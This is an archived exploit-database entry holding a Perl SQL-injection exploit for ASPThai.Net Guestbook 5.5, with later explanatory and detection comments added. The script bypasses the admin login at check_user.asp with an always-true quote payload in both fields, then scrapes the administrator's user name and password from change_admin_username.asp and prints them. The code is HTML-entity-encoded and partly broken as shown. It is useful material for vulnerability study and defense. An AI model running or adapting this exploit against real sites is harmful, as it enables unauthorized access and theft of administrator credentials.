seebugRootSSV:63350
HistoryJul 01, 2014 - 12:00 a.m.

ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit

2014-07-0100:00:00
Root
www.seebug.org
16

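No description provided by source. Going by the listing below, the guestbook's login handler (check_user.asp) accepts a quote-based tautology in both the user-name and password fields, which points to form input being concatenated into the SQL query. The admin page change_admin_username.asp then exposes the administrator's user name and password in plain text. On the application side the remedies are a parameterized query for the login check and storing a salted password hash instead of the password itself.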


                                                #!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5
# (And possibly higher; could not find a site to test it on)
# This exploit shows the username of the administrator and the password in plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net 
#irc.g00ns.net #g00ns  email = [email protected]
#(c) 2006

use LWP::UserAgent;
use HTTP::Cookies;

# NOTE(review): this listing is HTML-entity-encoded as published (&#39; is a
# single quote, &#34; a double quote, &#60; and &#62; the angle brackets), so it
# is not valid Perl as shown. No "use strict" / "use warnings" is visible, and
# all variables except the two "my" declarations are package globals.
#
# Defender summary: the script logs in to the guestbook's admin area by sending
# a SQL tautology in both login fields, then fetches an admin page and prints
# the two form values it finds there. The root causes on the application side
# are (1) login input concatenated into the SQL statement and (2) the admin
# password being stored and rendered in plain text.

# Base URL of the guestbook, taken verbatim from the first command-line argument.
$Server = $ARGV[0];

# This branch only pattern-matches: the =~ inside it is a second match against
# a single-quoted string, not an assignment, and $error is never set in this
# listing. The argument is therefore used exactly as given.
if($Server =~m/http/g)
{
$Server=~ &#39;http://$Server&#39;;
print 
}
else {
  print $error;
}

# No argument: show the usage text and stop.
if(!$Server) {usage();exit() ;}

head();

print &#34;\r\nGrabbing Username And Password\r\n\n&#34;;

# Logs in and keeps the session cookie so the admin page can be requested next.
# Detection: the client identifies itself with the fixed User-Agent "g00ns".


 $xpl = LWP::UserAgent-&#62;new() or die;
 $cookie_jar = HTTP::Cookies-&#62;new();

 $xpl-&#62;agent(&#39;g00ns&#39;);
 $xpl-&#62;cookie_jar($cookie_jar);

# POST to check_user.asp. Both txtUserName and txtUserPass carry the same
# value: a closing single quote followed by an always-true "or 'x'='x'"
# comparison (the literal compared is the percent-encoded spelling of "g00ns").
# That this is expected to pass the login implies the handler builds its SQL
# by string concatenation; the fix is to bind both fields as query parameters.
# Detection: a POST to check_user.asp whose login fields start with a single
# quote followed by " or ".
 $res = $xpl-&#62;post(
 $Server.&#39;check_user.asp&#39;,
 Content =&#62; [ 

	&#39;txtUserName&#39; =&#62; &#39;\&#39; or \&#39;%67%30%30%6e%73\&#39;=\&#39;%67%30%30%6e%73&#39;, 
	&#39;txtUserPass&#39; =&#62; &#39;\&#39; or \&#39;%67%30%30%6e%73\&#39;=\&#39;%67%30%30%6e%73&#39;,
	&#39;Submit&#39; =&#62; &#39;-= Login =-&#39;,
 ],
 );

# Build a GET for change_admin_username.asp, sent through the same user agent
# and therefore with the cookie obtained above.
my $req = HTTP::Request-&#62;new(GET =&#62; 

$Server.&#39;change_admin_username.asp&#39;

);

# NOTE(review): the Referer is set to admin_menu.asp; whether the application
# checks it cannot be told from this listing. A Referer header is chosen by
# the client and is not an access control.
$req-&#62;header(&#39;Referer&#39;, $Server.&#39;admin_menu.asp&#39;);

# This "my $res" is a new lexical; the POST response above was stored in the
# package global of the same name and is never inspected.
my $res = $xpl-&#62;request($req);

$info= $res-&#62;content;

# Abort when the page body contains either of the two failure strings.
if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) 
{ 
 die &#34;Error Connecting...\r\n&#34;; 
}

# Pull the first two value=" attributes out of the returned HTML. The two
# identical /g matches in scalar context advance through the page, so the
# first capture goes to $User and the second to $Pass. That the page returns
# the password in a form field at all means it is stored unhashed; store a
# salted hash and never render it back.

$info=~m/(value=\&#34;)(\n+|\w+|\W+)/g;
$User = $2;
$info=~m/(value=\&#34;)(\n+|\w+|\W+)/g;
$Pass= $2;

print &#34;UserName:$User\r\nPassword:$Pass\r\n&#34;;

# Prints the three-line banner naming the product and version the script
# targets. Declared with an empty prototype, so it takes no arguments.
sub head()
 {
 print &#34;\n=======================================================================\r\n&#34;;
 print &#34;* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n&#34;;   
 print &#34;=======================================================================\r\n&#34;;
 }
sub usage()
 {
 head();
 print &#34; Usage: Thaisql.pl &#60;Site&#62;  \r\n\n&#34;;
 print &#34; &#60;Site&#62; - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n&#34;;
 print &#34;=======================================================================\r\n&#34;;
 print &#34;   -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n&#34;;
 print &#34;www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n&#34;;
 print &#34;=======================================================================\r\n&#34;;

# milw0rm.com [2006-02-06]